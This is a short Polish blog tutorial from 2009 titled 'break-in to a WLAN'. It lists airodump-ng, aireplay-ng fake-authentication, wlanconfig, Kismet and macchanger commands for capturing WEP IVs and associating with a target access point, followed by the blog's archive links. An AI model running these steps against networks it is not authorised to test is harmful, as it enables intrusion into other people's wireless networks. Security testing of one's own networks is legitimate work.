Edytujemy /usr/local/etc/kismet.conf
Dodajemy gdzieś na początku linię:
source=madwifi_ag,wifi0,AtherosABG
Tryb klienta karty przestawiany poleceniami:
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode sta
Airodumpa uruchamiamy poleceniem:
airodump-ng --write /naszkataloggdzies/naszplik --channel x --ivs wifi0
Połączmy naszą kartę ze sprawdzanym AP'kiem:
aireplay-ng -1 0 -e SSID -a MAC_AP -h MAC_NASZEJ_KARTY wifi0
MAC'a naszej karty uzyskamy m.in. poprzez:
macchanger -s ath0
Minitutorial: włam na WLAN
czwartek, 22 stycznia 2009
Subskrybuj:
Komentarze do posta (Atom)
Archiwum bloga
-
►
2012
(16)
- ► października (2)
-
►
2011
(51)
- ► października (1)
-
▼
2009
(190)
- ► października (2)
-
▼
stycznia
(27)
- Logowanie ruchu sieciowego
- IPSec - tutorial
- Linux full backup & restore w praktyce 2
- Instalacja PHPList
- Certyfikaty Microsoft
- Photoshop i inne - dobry zestaw tutoriali
- Różne CMS'y
- Newsletter dla całej firmy
- HTML Url Encoding Reference
- Linux full backup & restore w praktyce
- BT3, kismet, airodump-ng i TP-Link TL-WN551G
- BackTrack 3 - instalacja na dysku twardym
- Problem - odbiorca wiadomości z Outlooka otrzymuje...
- Wardriving w teorii
- Jak sprawdzić kod produktu / klucz instalacyjny np...
- Identyfikacja i testowanie sprzętu PC pod Linuksem
- Jak nie powinna wyglądać domena?
- Squid - jak wyczyścić cache
- Symfony - dzień drugi
- A gdy już założę własną Firmę ...
- Hyper-V w kontekście mapowania portów COM -> Named...
- Symfony - dzień pierwszy
- Sendmail - naprowadzenie na założenie nowego konta
- Podstawowe typy ataków na strony WWW
- Hyper-V Manager - Access Denied - o co chodzi?
- Squid Transparent Proxy - przykładowa konfiguracja...
- Jak wyłączyć wyszukiwanie drukarek w Windows XP?
Brak komentarzy:
Prześlij komentarz